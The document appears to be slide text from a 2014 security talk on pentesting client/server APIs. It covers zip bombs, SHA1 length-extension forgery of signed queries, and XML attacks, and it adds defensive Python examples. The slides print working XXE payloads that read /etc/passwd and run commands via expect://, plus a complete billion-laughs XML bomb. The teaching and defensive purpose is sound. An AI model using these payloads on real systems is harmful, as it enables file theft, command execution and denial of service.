
Pentesting client/server API

Sergey Belov
$ whoami

• Senior Security Auditor at Digital Security
• BugHunter: Google, Yandex, Badoo, Yahoo +++
• Writer: habrahabr, Xakep magazine
• CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013
• Speaker: CodeFest 2012, ZeroNights 0x03
• Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)

© 2002—2014, Digital Security 2
What are we talking about?

API

Hacking via API

From interface to API methods

What should we test?


• Logic!
• Bypassing restrictions (sqli/xss)
• Parameter tampering
Developing
• Stop hacks and custom implementation in API! Really

© 2002—2014, Digital Security 12


Hacking via API

ZIP

42 Kb…
…10 Gb?
…100 Gb?
…100 Tb?
…4.5 Pb! http://www.unforgettable.dk/

Say HELLO to ZIP BOMB!
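For the upload endpoint on the receiving side of the 42 Kb to 4.5 Pb archive above, decompression has to be bounded by both the ratio the headers advertise and the bytes that actually come out. This is an added Python example, not the talk's code; the cap values are assumed policy numbers and the test archives are constructed in memory.

```python
import io
import zipfile

# Assumed policy values, not from the talk: tune to what the endpoint really needs.
MAX_TOTAL_BYTES = 50 * 1024 * 1024   # hard cap on bytes actually inflated per upload
MAX_RATIO = 100                      # uncompressed/compressed ratio tolerated per member


class ZipBombSuspected(ValueError):
    pass


def inflate_bounded(blob: bytes, max_total: int = MAX_TOTAL_BYTES,
                    max_ratio: float = MAX_RATIO) -> dict:
    """Inflate every member in chunks and return {name: inflated_size}.

    Two gates: the ratio advertised in the headers, and a running count of what
    the decompressor really emits, because a crafted header can under-report.
    """
    sizes = {}
    inflated_total = 0
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                raise ZipBombSuspected(f"{info.filename}: declared ratio too high")
            n = 0
            with zf.open(info) as member:
                while chunk := member.read(64 * 1024):
                    n += len(chunk)
                    inflated_total += len(chunk)
                    if inflated_total > max_total:
                        raise ZipBombSuspected(
                            f"{info.filename}: inflated past {max_total} bytes")
            sizes[info.filename] = n
    return sizes


def make_zip(members: dict) -> bytes:
    """Constructed helper: build a DEFLATE archive in memory for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def is_accepted(blob: bytes, **limits) -> bool:
    try:
        inflate_bounded(blob, **limits)
        return True
    except ZipBombSuspected:
        return False
```

Run the inflation in a worker with its own memory and time limits as well; the ratio gate is cheap, but the byte counter only stops a bomb after the cap's worth of work has been done.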
Hacking via API

The evil of JavaScript

and

http://habrahabr.ru/post/186160/
Hacking via API

Crypto

Query signing
Sign = sha*(…+DATA+…)
APIkey

But why?

Say hello again.

To length extension attack

A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
TOKEN=sha1(KEY+DATA)
Hacking via API

Some have hijacked just 1 request…

What does the attacker know?
• Original data
• Sign (token)

What does the attacker want?
Change some data / change params

A=1&B=2&C=3\x80\x00\x00…\x02&C=4

Can sign new query without API key!

Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU: sig = md5(uid + params + private_key)

http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
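The defender's side of the sha1(KEY+DATA) scheme above, as an added Python example that is not from the talk: the prefix-MAC signer beside an HMAC replacement, constant-time verification, and a request gate that rejects the two artefacts the forged query on the slide has to carry. The key and the byte layout of the padding are constructed for the demo.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl

# Constructed demo values; the talk publishes no key.
API_KEY = b"demo-api-key-not-from-the-talk"
ORIGINAL = b"A=1&B=2&C=3"
# Shape of the slide's forged query: glue padding (0x80, NULs, bit length) then C=4.
# The padding bytes are illustrative, not a computed extension.
FORGED = b"A=1&B=2&C=3\x80" + b"\x00" * 40 + b"\x02\x18&C=4"


def sign_naive(key: bytes, data: bytes) -> str:
    """TOKEN = sha1(KEY + DATA) as on the slide. A Merkle-Damgard hash over a
    secret prefix leaks its internal state in the tag, which is why one valid
    (data, tag) pair is enough to sign data || padding || extra."""
    return hashlib.sha1(key + data).hexdigest()


def sign_hmac(key: bytes, data: bytes) -> str:
    """HMAC hashes an inner keyed digest under an outer key, so the tag is not
    the raw state of a hash that can simply be fed more input."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def verify(signer, key: bytes, data: bytes, tag: str) -> bool:
    """compare_digest keeps the comparison constant-time: no byte-by-byte oracle."""
    return hmac.compare_digest(signer(key, data), tag)


def query_is_clean(data: bytes) -> bool:
    """Reject what an extended query cannot avoid carrying once the server has
    URL-decoded it: raw padding bytes (0x80 and NUL never belong in a query) and
    a parameter name given twice (the appended C=4 only bites by overriding C=3)."""
    if b"\x80" in data or b"\x00" in data:
        return False
    names = [k for k, _ in parse_qsl(data.decode("latin-1"), keep_blank_values=True)]
    return len(names) == len(set(names))


def accept_request(key: bytes, data: bytes, tag: str) -> bool:
    """Server-side gate: HMAC tag plus structural checks on the query."""
    return query_is_clean(data) and verify(sign_hmac, key, data, tag)
```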
Hacking via API

Request hijacking…
How?
Hacking via API

XML? XML entities!

DTD example:

<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">

XML example:

<author>&writer;&copyright;</author>

XML entities?
External Entity!

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>

<foo>&xxe;</foo>

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"expect://id" >]>

<foo>&xxe;</foo>

XML Bombs!

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
What are we talking about?

Man in the Middle

Hacking via API

Examples?

2013-11-19 by Reginaldo Silva

https://www.facebook.com/BugBounty/posts/778897822124446
http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution

Testing:
• https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008)
• XXE to RCE https://gist.github.com/joernchen/3623896

Development:
• Disable entities
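One way to act on "Disable entities" against the three payload shapes shown earlier (file://, expect://, and the lolz bomb): an added Python example, not the talk's code, that refuses any DOCTYPE or entity declaration at the expat level before a tree is built, so the check works on the parsed prolog rather than on a byte pattern that a different document encoding would hide. The sample documents are constructed here.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised for any document that declares a DTD or an entity."""


def _reject_dtd(data: bytes) -> None:
    """Walk the document once with expat handlers that abort on the prolog
    constructs every XXE and entity-expansion payload needs."""
    p = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE {name!r} not accepted")

    def on_entity(*_):
        raise UnsafeXML("entity declaration not accepted")

    p.StartDoctypeDeclHandler = on_doctype
    p.EntityDeclHandler = on_entity
    p.ExternalEntityRefHandler = lambda *_: 0   # never resolve file:// or expect://
    p.Parse(data, True)


def parse_untrusted(data: bytes) -> ET.Element:
    """Gate first, then build the tree. With no DTD allowed, only the five
    predefined entities (&amp; &lt; &gt; &apos; &quot;) can appear in the body."""
    _reject_dtd(data)
    return ET.fromstring(data)


def accepts(data: bytes) -> bool:
    try:
        parse_untrusted(data)
        return True
    except (UnsafeXML, ET.ParseError, expat.ExpatError):
        return False


# Constructed samples: a benign request and the payload shapes from the slides.
BENIGN = b'<?xml version="1.0"?><request><author>Donald Duck</author></request>'
XXE = (b'<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
       b'<foo>&xxe;</foo>')
BOMB = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
        b'<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]>'
        b'<lolz>&lol1;</lolz>')
# Same XXE payload re-encoded as UTF-16: a byte-level search for "<!DOCTYPE" misses it.
XXE_UTF16 = XXE.decode().encode("utf-16")
```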


Hacking via API

Finally:
• Re-test all interface restrictions;
• Specific compressions;
• JS callbacks;
• Crypto + SSL test + hardcoded credentials (hackapp.com);
• XML - XXE;
• Anything else :]

Thanks for your attention!

Questions?

Digital Security in Moscow: (495) 223-07-86
Digital Security in Saint Petersburg: (812) 703-15-47
twitter.com/sergeybelove
sbelov@dsec.ru
